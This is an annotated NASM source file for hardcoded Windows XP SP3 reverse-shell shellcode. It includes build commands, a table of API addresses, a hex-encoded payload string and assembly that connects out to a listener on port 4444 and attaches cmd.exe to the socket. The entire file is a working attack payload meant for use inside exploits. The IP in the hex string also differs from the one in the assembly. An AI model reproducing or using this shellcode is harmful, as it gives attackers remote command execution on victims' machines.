; Windows XP SP3 Eng Hardcoded Reverse shell (92 bytes) ; ; Author: Daniel Solstad (dsolstad.com) ; ; Finding addresses of system calls: ; > arwin.exe ws2_32.dll bind ; arwin - win32 address resolution program - by steve hanna - v.01 ; bind is located at 0x71ab4480 in ws2_32.dll ; ; Finding out which dlls target exe file loads by itself: ; > tasklist.exe /m /fi "imagename eq vulnerable.exe" ; ; Compiling on Windows: ; > nasm.exe -f win32 -o shell.obj shell.asm ; > ld.exe shell.obj -o shell.exe ; ; Get shellcode string in hex: ; $ for i in $(objdump -d shell.exe |grep "^ " |cut -f2); do echo -n '\x'$i; done; echo ; ; Address table Windows XP SP3 Eng: ; ; ws2_32.dll: ; closesocket() 71AB3E2B ; accept() 71AC1040 ; listen() 71AB8CD3 ; bind() 71AB4480 ; connect() 71AB4A07 ; WSASocketA() 71AB8B6A ; WSAStartup() 71AB6A55 ; WSAGetLastError() 71AB3CCE ; ; kernel32.dll: ; LoadLibraryA() 7C801D7B ; ExitProcess() 7C81CAFA ; WaitForSingleObject() 7C802530 ; CreateProcessA() 7C80236B ; SetStdHandle() 7C81d363 ; ; msvcrt.dll: ; system() 77C293C7 ; ; ; Notes: ; ; * LoadLibraryA() and WSAStartup() needs to be uncommented if run as a standalone executable. ; In an exploit environment, ws2_32.dll is probably already loaded and WSAStartup() already called. ; ; * The code can certainly be shorter in size, but for readability and a little more robustness I have kept it like this. ; ; ; Shellcode in hex string (without LoadLibrary and WSAStarup): ; ; \x31\xc0\x50\x50\x50\x50\x6a\x01\x6a\x02\xb8\x6a\x8b\xab\x71\xff\xd0\x89\xc3\x68 ; \xc0\xa8\x38\x01\xb8\x02\x01\x11\x5c\xfe\xcc\x50\x89\xe6\x31\xc0\xb0\x10\x50\x56 ; \x53\xb8\x07\x4a\xab\x71\xff\xd0\xba\x63\xd3\x81\x7c\x53\x6a\xf6\xff\xd2\x53\x6a ; \xf5\xff\xd2\x53\x6a\xf4\xff\xd2\xc7\x44\x24\xfb\x41\x63\x6d\x64\x8d\x44\x24\xfc ; \x8d\x64\x24\xfc\x50\xb8\xc7\x93\xc2\x77\xff\xd0 [BITS 32] global _start section .text _start: ; LoadLibraryA(_In_ LPCTSTR lpFileName) ;xor eax, eax ;mov ax, 0x3233 ;push eax ; Push 0x00003233 (ASCII 32\0) ;push 0x5f327377 ; Push 0x5f327377 (ASCII ws2_) ;mov ebx, esp ; Store pointer to "ws2_32" in ebx ;push ebx ; Arg lpFileName = ebx -> "ws2_32" ;mov eax, 0x7c801d7b ;call eax ; WSAStartup(WORD wVersionRequired, LPWSADATA lpWSAData) ;add esp, 0xFFFFFE70 ; Creating space on stack (400 bytes) ;push esp ; Arg lpWSAData = top of stack ;push 0x101 ; Arg wVersionRequired = 1.1 ;mov eax, 0x71ab6a55 ;call eax ; WSASocketA(int af, int type, int protocol, ; LPWSAPROTOCOL_INFOA lpProtocolInfo, ; GROUP g, DWORD dwFlags) xor eax, eax push eax ; Arg dwFlags = 0 push eax ; Arg g = 0 push eax ; Arg lpProtocolInfo = 0 push eax ; Arg protocol = IPPROTO_TCP push 0x1 ; Arg type = SOCK_STREAM push 0x2 ; Arg af = AF_INET mov eax, 0x71AB8B6A call eax mov ebx, eax ; Store WSASocket() handler ; connect(SOCKET s, const sockaddr *name, int namelen); push 0x82FDA8C0 ; IP address, mov eax, 0x5c110102 ; Port nr, 4444 (first 2 bytes) dec ah ; eax: 0x5c110102 -> 0x5c110002 (Mitigating null byte) push eax ; Store portnr on stack mov esi, esp ; Store pointer to portnr xor eax, eax mov al, 0x10 push eax ; Arg namelen = 16 bytes push esi ; Arg *name = esi -> 0x5c110002 (5c11 = 4444, 0002 = INET_AF) push ebx ; Arg s = WSASocket() handler mov eax, 0x71ab4a07 call eax ; SetStdHandle(_In_ DWORD nStdHandle, _In_ HANDLE hHandle) mov edx, 0x7c81d363 push ebx ; Arg hHandle = WSASocket() handler push 0xfffffff6 ; Arg nStdHandle = -0A (STD_INPUT) call edx push ebx ; Arg hHandle = WSASocket() handler push 0xfffffff5 ; Arg nStdHandle = -0B (STD_OUTPUT) call edx push ebx ; Arg hHandle = WSASocket() handler push 0xfffffff4 ; Arg nStdHandle = -0C (STD_ERROR) call edx ; system(const char *command) mov DWORD [esp-0x5], 0x646d6341 ; Store string "Acmd" 5 bytes from top of stack lea eax, [esp-0x4] ; Store pointer to the string "cmd\0" in eax lea esp, [esp-0x4] ; Manually update esp push eax ; Arg *command = eax -> "cmd" mov eax, 0x77c293c7 call eax ; Alternative version which saves some bytes using ebp instead of esp. ; We save space because we don't need to update the state of ebp manually. ; The reason I use esp instead is that ebp might get overwritten by the exploit. ; system(const char *command) ;mov DWORD [ebp-0x5], 0x646d6341 ;lea eax, [ebp-0x4] ;push eax ;mov eax, 0x77c293c7 ;call eax